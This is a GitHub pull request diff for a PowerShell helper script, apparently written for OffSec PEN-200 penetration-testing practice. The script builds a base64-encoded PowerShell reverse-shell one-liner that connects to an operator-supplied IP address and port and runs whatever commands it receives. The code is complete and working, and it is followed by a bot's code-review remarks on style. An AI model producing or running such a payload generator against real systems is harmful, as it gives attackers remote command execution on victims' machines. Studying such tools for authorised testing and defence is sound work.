Improve base64 PowerShell script #57

Merged
merged 1 commit into from
Mar 30, 2024
25 changes: 21 additions & 4 deletions bin/base64convert.ps1
@@ -1,10 +1,24 @@
#!/usr/bin/env pwsh

# This script generates a base64 encoded powershell reverse shell one-liner
# and copies it to the clipboard

# Cf. PEN-200, 9.3.1, Listing 32 - Encoding the oneliner in PowerShell on Linux
# https://portal.offsec.com/courses/pen-200/books-and-videos/modal/modules/common-web-application-attacks/file-upload-vulnerabilities/using-executable-files

# Prompt for IP Address
$ipAddress = Read-Host -Prompt "Enter the IP address"
Write-Host "Enter the IP address."
Write-Host "If you enter only the last two octets, `192.168` will be prepended by default."
$ipAddress = Read-Host
# $ipAddress = Read-Host -Prompt "Enter the IP address."

# Check if the input is only the last two octets and prepend "192.168" if true
$octets = $ipAddress -split '\.'
if ($octets.Count -eq 2) {
$ipAddress = "192.168." + $ipAddress
}

Write-Host "Your IP address is $ipAddress"

# Validate the IP Address
if (-not [System.Net.IPAddress]::TryParse($ipAddress, [ref]$null)) {
Expand All @@ -16,19 +30,22 @@ if (-not [System.Net.IPAddress]::TryParse($ipAddress, [ref]$null)) {
$portNumber = Read-Host -Prompt "Enter the port number"

# Validate the Port Number
if ($portNumber -notmatch '^\d+$' -or $portNumber -lt 0 -or $portNumber -gt 65535) {
if ($portNumber -notmatch '^\d+$' -or [int]$portNumber -lt 0 -or [int]$portNumber -gt 65535) {
Write-Host "Invalid port number. Please enter a port number between 0 and 65535."
exit
}

# Construct the $Text string with variable expansion
# Cf. https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
$Text = "`$client = New-Object System.Net.Sockets.TCPClient('$ipAddress',$portNumber);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0){;`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

## $EncodedText

# Output the constructed string (for verification or debugging)
Write-Host "Encoded string is: "
Write-Host $EncodedText

Write-Host "String copied to clipboard"
Invoke-Expression "echo -n '$EncodedText' | tr -d '\n' | pbcopy"
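Review bot: The backticks around 192.168 in the new prompt string are PowerShell escape characters inside double quotes, so they are silently dropped and the user never sees the intended quoting; write the literal as `Write-Host "If you enter only the last two octets, '192.168' will be prepended by default."` instead. The same hunk also leaves a commented-out duplicate of the old prompt (`# $ipAddress = Read-Host -Prompt "Enter the IP address."`) and the second hunk keeps `## $EncodedText`; both are dead lines that should be deleted rather than carried in the file. In the rewritten port check, `[int]$portNumber -lt 0` can never be true once `^\d+$` has matched, so the condition can be reduced to the regex test and the upper bound. Parts of the second hunk's context are collapsed on this page, so lines between the two hunks were not reviewed.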